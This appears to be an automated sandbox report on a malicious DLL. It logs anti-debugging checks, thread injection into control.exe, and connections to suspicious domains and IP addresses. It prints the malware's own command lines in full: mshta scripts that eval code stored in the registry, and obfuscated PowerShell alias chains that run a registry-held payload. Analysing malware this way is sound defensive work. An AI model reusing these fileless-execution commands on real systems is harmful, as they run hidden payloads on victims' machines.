Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1716 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: threadDelayed 1395 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 559 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 513 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 533 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 376 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 586 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: threadDelayed 438 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 861
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5211
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 585
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7538
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1838
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_04C2D1A3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0103E230
Source: regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655416579.00000000032F3000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.654359694.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.655489490.000000000332C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471374260.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.515952009.00000000032E9000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.519374746.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.673893469.0000000003320000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010449B3 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey, 0_2_010449B3
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0C57 mov eax, dword ptr fs:[00000030h] 0_2_013A0C57
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0CA5 mov eax, dword ptr fs:[00000030h] 0_2_013A0CA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0CE8 mov eax, dword ptr fs:[00000030h] 0_2_013A0CE8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0B14 mov eax, dword ptr fs:[00000030h] 0_2_013A0B14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC mov eax, dword ptr fs:[00000030h] 0_2_013A0BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0B14 mov eax, dword ptr fs:[00000030h] 3_2_030E0B14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC mov eax, dword ptr fs:[00000030h] 3_2_030E0BFC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0C57 mov eax, dword ptr fs:[00000030h] 3_2_030E0C57
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0CA5 mov eax, dword ptr fs:[00000030h] 3_2_030E0CA5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0CE8 mov eax, dword ptr fs:[00000030h] 3_2_030E0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0CE8 mov eax, dword ptr fs:[00000030h] 4_2_006D0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0BFC mov eax, dword ptr fs:[00000030h] 4_2_006D0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0C57 mov eax, dword ptr fs:[00000030h] 4_2_006D0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0CA5 mov eax, dword ptr fs:[00000030h] 4_2_006D0CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_006D0B14 mov eax, dword ptr fs:[00000030h] 4_2_006D0B14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0CA5 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0CE8 mov eax, dword ptr fs:[00000030h] 5_2_02BF0CE8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0C57 mov eax, dword ptr fs:[00000030h] 5_2_02BF0C57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0BFC mov eax, dword ptr fs:[00000030h] 5_2_02BF0BFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_02BF0B14 mov eax, dword ptr fs:[00000030h] 5_2_02BF0B14
Checks if the current process is being debugged
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_010392F6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053D92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_053D92F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AB92F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 4_2_04AB92F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C392F6 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 5_2_04C392F6

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 3.20.161.64 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 8E0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: EC0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: ED0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C1112E0 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: 8E0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: EC0000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: ED0000 protect: page execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5116 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 5952 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 5832 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe Thread register set: target process: 6676
Source: C:\Windows\System32\control.exe Thread register set: target process: 4856
Source: C:\Windows\System32\control.exe Thread register set: target process: 4964
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 88E31580
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: control.exe, 0000002A.00000000.636220674.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.611936251.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.654227363.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002A.00000000.601923838.000002081E4C0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.600743349.000001C8AB5E0000.00000002.00020000.sdmp, control.exe, 0000002B.00000000.635430988.000001C8AB5E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
